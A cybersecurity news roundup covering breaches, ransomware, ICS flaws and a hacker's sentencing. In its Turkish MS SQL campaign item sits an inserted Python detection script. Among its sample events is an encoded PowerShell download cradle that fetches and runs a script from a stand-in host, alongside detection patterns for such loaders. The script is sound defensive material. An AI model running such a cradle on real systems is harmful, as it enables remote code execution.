Texas healthcare provider suffers data breach
Texas-based care provider HMG Healthcare says that unencrypted files containing personal data belonging to residents and employees at 40 affiliated nursing facilities were accessed in August, although the organization only learned of the breach in November. HMG says it does not know exactly what data was stolen, but that it was likely PII and medical records. In a filing submitted to the Texas Attorney General on Monday, HMG says approximately 75,000 Texas residents were affected, along with an unknown number of residents of other states.
Entire population of Brazil possibly exposed in data leak
Research by Cybernews has revealed that a publicly accessible Elasticsearch instance may have exposed 223 million records on Brazilian citizens, a figure that would cover the country's entire population. Elasticsearch is a widely used engine for searching, analyzing, and visualizing large volumes of data, and according to Cybernews, “the leaked data was not linked to a specific company or organization, preventing Cybernews from identifying the source of the leak.” The cluster, hosted on a cloud server, contained names, dates of birth, gender, and taxpayer numbers. Cybernews confirms that the data is at least no longer publicly accessible.
Decryptor for Tortilla ransomware released
Cisco Talos has released a decryptor for the Tortilla variant of the Babuk ransomware and has shared it with Avast. According to The Hacker News, threat intelligence that Cisco Talos shared with Dutch law enforcement facilitated the arrest of the threat actor behind the operation. Avast added that “a single private key is used for all victims of the Tortilla threat actor, which makes the update to the decryptor especially useful, as all victims of the campaign can use it to decrypt their files.”
(The Hacker News and Avast)
Bosch warns of nutrunner vulnerabilities
This is not the name of a piece of malware; a nutrunner is a cordless, handheld torque wrench used in automotive and other industries for safety-critical tightening operations. Researchers at Nozomi found security flaws in Bosch Rexroth’s NXA015S-36V-B nutrunner, which communicates over a wireless network to send data and receive instructions. The researchers found over two dozen vulnerabilities that could be used to render the device inoperable, slow down assembly lines, or even alter tightening program configurations, specifically the torque value, resulting in bolts that are too loose or overtightened. A total of 25 CVE identifiers have been assigned to the nutrunner flaws, 11 of them rated ‘high severity’.
Huge thanks to this week’s episode sponsor, Vanta

ShinyHunters hacker gets three years
The U.S. District Court in Seattle has sentenced French national Sebastien Raoult, age 22, to three years in prison and ordered him to pay $5,000,000 in restitution for his role in a phishing scheme run by the ShinyHunters hacking group. Between April 2020 and July 2021, he and his accomplices used specially crafted phishing pages that mimicked the login portals of their victims’ employers. This gave them account credentials, which they then used to log in to the systems of 60 companies, stealing data, including information about cloud instances and third-party service providers. FBI agent Richard A. Collodi, quoted in a press release posted by the United States Attorney’s Office for the Western District of Washington, described Raoult’s work as “remarkably devious.”
(Bleeping Computer and United States Attorney’s Office of the Western District of Washington)
Toronto Zoo suffers ransomware attack
The zoo posted a notification on its website on Monday confirming that “the animals, habitat support, and care systems are safe and have not been affected by the breach,” and that the zoo remains open to guests under normal operations. Representatives also noted that the zoo does not store any credit card information. Its press release read, in part, “unfortunately, these incidents are becoming more and more common, and we are grateful we took steps over the past few years to upgrade our technology infrastructure.”
Turkish hackers target Microsoft SQL servers in Americas, Europe
Apparently unrelated to the Turkish APT group Sea Turtle that we mentioned on Monday, a group of financially motivated threat actors believed to be operating out of Turkey has been observed attacking Microsoft SQL Server databases to deploy ransomware. According to a report from cybersecurity firm Securonix, “the campaign, named RE#TURGENCE, appears aimed at organizations in the US, Europe, and Latin America, with the attacks ending either in a Mimic ransomware infection or in access to the compromised environment being sold to other threat actors. The attacks include executing PowerShell scripts leading to a heavily obfuscated Cobalt Strike payload designed to be injected in a Windows process.”
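The report describes SQL Server databases being abused to run PowerShell scripts that stage an obfuscated Cobalt Strike payload. The Python script below is added here as an illustration of the detection logic a SOC would run over process-creation telemetry for that chain; it is not code from Securonix or from this page. It assumes that sqlservr.exe shows up as the parent process when a database feature such as xp_cmdshell is used to launch commands (an assumption, not something the report states), and it runs over a few constructed Sysmon-style events embedded in the script.

```python
import base64
import binascii
import ntpath
import re

# Process-creation events in the shape of Sysmon Event ID 1, flattened to dicts.
# These samples are constructed for the example; they are not logs from the
# Securonix report. Event 0 models the assumed attack chain (sqlservr.exe spawning
# an encoded PowerShell download cradle), event 1 is benign admin use, and event 2
# is a plain shell launched by the database engine.
def _encode_command(ps: str) -> str:
    """Encode a script the way PowerShell's -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")

SQLSERVR = r"C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

SAMPLE_EVENTS = [
    {"ParentImage": SQLSERVR, "Image": POWERSHELL,
     "CommandLine": "powershell.exe -nop -w hidden -enc "
                    + _encode_command("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')")},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": POWERSHELL,
     "CommandLine": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
    {"ParentImage": SQLSERVR, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},
]

# Shells a database engine has no business launching. Assumption: sqlservr.exe is
# the parent when xp_cmdshell or a similar feature is used to run OS commands.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}

# -EncodedCommand and the abbreviations PowerShell accepts (-e, -ec, -enc), then base64.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)")

# Substrings typical of download cradles and obfuscated loaders once decoded.
CRADLE_INDICATORS = ("iex", "invoke-expression", "downloadstring",
                     "frombase64string", "[char]", "-join")


def decode_encoded_command(command_line: str):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = ENCODED_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="replace")
    except (binascii.Error, ValueError):
        return None


def analyze_event(event: dict) -> dict:
    """Evaluate one process-creation event; return the flags raised and any decoded script."""
    flags = []
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    child = ntpath.basename(event.get("Image", "")).lower()
    if parent == "sqlservr.exe" and child in SHELLS:
        flags.append("sqlserver_spawned_shell")
    decoded = decode_encoded_command(event.get("CommandLine", ""))
    if decoded is not None:
        flags.append("encoded_command")
        if any(ind in decoded.lower() for ind in CRADLE_INDICATORS):
            flags.append("download_cradle_or_obfuscation")
    return {"flags": flags, "decoded": decoded}


def find_alerts(events, min_flags: int = 1):
    """Indices of events that raised at least min_flags flags, for triage."""
    return [i for i, ev in enumerate(events) if len(analyze_event(ev)["flags"]) >= min_flags]


if __name__ == "__main__":
    for i, ev in enumerate(SAMPLE_EVENTS):
        print(i, analyze_event(ev))
```

The decode step is what makes the rule useful: an encoded command hides the cradle from plain string matching, so the detection first recovers the script and only then looks for indicators. In a real deployment the same logic would read Sysmon Event ID 1 or Security event 4688 with command-line auditing enabled, and the parent/child pairing alone (event 2 above) is worth an alert even when nothing is encoded.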
Windows 10 BitLocker security update fails
Windows 10 users worldwide are reporting problems installing Microsoft’s January Patch Tuesday updates: the KB5034441 security update for BitLocker fails with error 0x80070643. The update was released as part of the January 2024 Patch Tuesday to address CVE-2024-20666, a BitLocker security feature bypass that could allow access to encrypted data. The update is applied to the Windows Recovery Environment partition, which on many systems is too small to hold it. So far Microsoft has offered only a manual workaround: enlarge the Windows Recovery Partition so there is enough room for the security update to install.